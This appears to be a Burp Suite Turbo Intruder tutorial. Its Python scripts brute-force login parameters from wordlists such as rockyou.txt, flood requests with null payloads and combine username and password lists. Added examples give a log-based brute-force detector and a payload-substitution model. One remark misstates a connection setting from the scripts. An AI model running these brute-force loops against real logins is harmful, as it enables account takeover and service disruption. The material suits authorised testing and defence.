Turbo Intruder in Burp Suite
Turbo Intruder is a Burp Suite extension for sending very large numbers of HTTP requests, used for brute forcing or fuzzing web applications.
Using Single Parameter
In the request, replace the value to be brute forced with “%s”.
For example, set %s as the value of the password parameter,
then we can brute force the password.
Here is the Python cheat sheet. Pick whichever payload loop fits the situation; only one of them belongs in queueRequests at a time.
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=5,
                           pipeline=False
                           )

    # Keep only one of the payload loops below.

    # Brute force (wordlist)
    for word in open('/usr/share/wordlists/rockyou.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute force (0 - 255)
    for i in range(0, 256):  # range() excludes its end value, so 256 is needed to reach 255
        engine.queue(target.req, str(i))

    # Brute force (0000 - 9999)
    for word in open('/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute Force (alphabet)
    for word in open('/usr/share/seclists/Fuzzing/char.txt'):
        engine.queue(target.req, word.rstrip())

    # Brute Force (alphanum upper-lower)
    for word in open('/usr/share/seclists/Fuzzing/alphanum-case.txt'):
        engine.queue(target.req, word.rstrip())

    # Null payloads (infinite loop): i is never incremented, so the same
    # request is queued until the attack is stopped manually
    i = 0
    while i < 1:
        engine.queue(target.req, None)

    # Null payloads (100 loops)
    i = 0
    while i < 100:
        engine.queue(target.req, None)
        i += 1


def handleResponse(req, interesting):
    if interesting:
        table.add(req)
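The loops above generate a burst of near-identical login attempts from one client, which is exactly the pattern a defender can detect in web server logs. The following script is an added example and is not part of the original cheat sheet or of Turbo Intruder; it parses a few constructed combined-format log lines (hypothetical IPs, times and paths), counts failed POSTs to the login path per client inside a sliding time window, and flags clients whose peak rate meets a threshold. It also reports which flagged clients subsequently received a non-error response from the login path, the signal that a guess may have succeeded.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: ip ident user [timestamp] "METHOD PATH PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample lines (hypothetical hosts and times, not from a real server):
# 203.0.113.7 hammers /login and finally gets a 302; 198.51.100.5 fails twice, then logs in.
SAMPLE_LOG = """\
198.51.100.5 - - [10/Oct/2023:13:54:10 +0000] "GET /login HTTP/1.1" 200 1834 "-" "Mozilla/5.0"
198.51.100.5 - - [10/Oct/2023:13:54:25 +0000] "POST /login HTTP/1.1" 401 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:01 +0000] "POST /login HTTP/1.1" 401 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:01 +0000] "POST /login HTTP/1.1" 401 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:02 +0000] "POST /login HTTP/1.1" 401 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:02 +0000] "POST /login HTTP/1.1" 401 512 "-" "Mozilla/5.0"
198.51.100.5 - - [10/Oct/2023:13:55:03 +0000] "POST /login HTTP/1.1" 401 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:03 +0000] "POST /login HTTP/1.1" 401 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:03 +0000] "POST /login HTTP/1.1" 401 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:04 +0000] "POST /login HTTP/1.1" 401 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:04 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.5 - - [10/Oct/2023:13:55:20 +0000] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, path, status; None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def failed_logins(lines, path="/login"):
    """Group timestamps of failed (4xx/5xx) POSTs to the login path by client IP."""
    failures = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == path and rec["status"] >= 400:
            failures[rec["ip"]].append(rec["ts"])
    return failures


def peak_rate(timestamps, window):
    """Largest number of events that fall inside any sliding window of the given length."""
    times = sorted(timestamps)
    peak, start = 0, 0
    for end, t in enumerate(times):
        while t - times[start] > window:   # slide the window start forward
            start += 1
        peak = max(peak, end - start + 1)
    return peak


def detect_bruteforce(log_text, threshold=5, window_seconds=30, path="/login"):
    """Return {ip: peak_failures} for clients whose failed-login burst reaches the threshold."""
    window = timedelta(seconds=window_seconds)
    flagged = {}
    for ip, stamps in failed_logins(log_text.splitlines(), path).items():
        peak = peak_rate(stamps, window)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


def successes_from_flagged(log_text, flagged, path="/login"):
    """Flagged IPs that also got a non-error response from the login path (a guess may have worked)."""
    hits = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["ip"] in flagged and rec["method"] == "POST" \
                and rec["path"] == path and rec["status"] < 400:
            hits.add(rec["ip"])
    return hits


if __name__ == "__main__":
    flagged = detect_bruteforce(SAMPLE_LOG)
    print("burst clients:", flagged)
    print("possible successful guesses:", successes_from_flagged(SAMPLE_LOG, flagged))
```

The threshold and window are deliberately parameters: a legitimate user who mistypes twice in a minute stays below them, while the concurrentConnections=5 / requestsPerConnection=100 settings from the script above produce dozens of failures per second from one address.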
Using Multiple Parameters
In addition to a single parameter, we can brute force multiple parameters at once, e.g. username and password, by placing a %s in each of them.
Here is the Python script. We pass a list with one word per %s placeholder, in the order the placeholders appear in the request, as below.
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=5,
                           requestsPerConnection=100,
                           pipeline=False)

    # Set multiple words for parameters: the first word fills the first %s, the second the second.
    for word1 in open('/path/to/usernames'):
        for word2 in open('/path/to/passwords'):
            engine.queue(target.req, [word1.rstrip(), word2.rstrip()])


def handleResponse(req, interesting):
    # currently available attributes are req.status, req.wordcount, req.length and req.response
    if req.status != 404:
        table.add(req)
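To make the %s convention from both sections concrete, here is an added, stand-alone model of the substitution that engine.queue performs; it is not Turbo Intruder's code and runs without Burp. A single string fills the only marker, a list fills the markers left to right, a count mismatch is rejected, and a payload that itself contains "%s" is inserted literally rather than being re-expanded. queued_requests generalizes the nested username/password loop to any number of wordlists. The request template and the wordlist entries are constructed sample values.

```python
from itertools import product
from typing import List, Sequence, Union

# Hypothetical request template: each %s marks a position a payload will fill.
LOGIN_REQUEST = (
    "POST /login HTTP/1.1\r\n"
    "Host: example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "username=%s&password=%s"
)


def fill_request(template: str, payloads: Union[str, Sequence[str]]) -> str:
    """Substitute payloads into the %s markers in order of appearance.

    Splitting on the marker (rather than repeated str.replace) guarantees that a payload
    containing "%s" is inserted verbatim and never treated as a new marker.
    """
    if isinstance(payloads, str):
        payloads = [payloads]
    parts = template.split("%s")
    markers = len(parts) - 1
    if markers != len(payloads):
        raise ValueError(
            f"template has {markers} %s marker(s) but {len(payloads)} payload(s) were given"
        )
    out = parts[0]
    for payload, tail in zip(payloads, parts[1:]):
        out += payload + tail
    return out


def queued_requests(template: str, *wordlists: Sequence[str]) -> List[str]:
    """Every request the nested loops would queue: the cartesian product of all wordlists.

    Entries are stripped of trailing newlines, mirroring word.rstrip() in the scripts.
    """
    combos = product(*[[w.rstrip() for w in wl] for wl in wordlists])
    return [fill_request(template, list(combo)) for combo in combos]


if __name__ == "__main__":
    # Constructed sample wordlists, as if read from the username and password files.
    users = ["admin\n", "alice\n"]
    passwords = ["password\n", "letmein\n", "qwerty\n"]
    plan = queued_requests(LOGIN_REQUEST, users, passwords)
    print(f"{len(plan)} requests would be queued; first one:\n{plan[0]}")
```

The product size is the point to notice before starting an attack: two wordlists of 1,000 entries each queue 1,000,000 requests, which is why the multi-parameter script raises requestsPerConnection to 100.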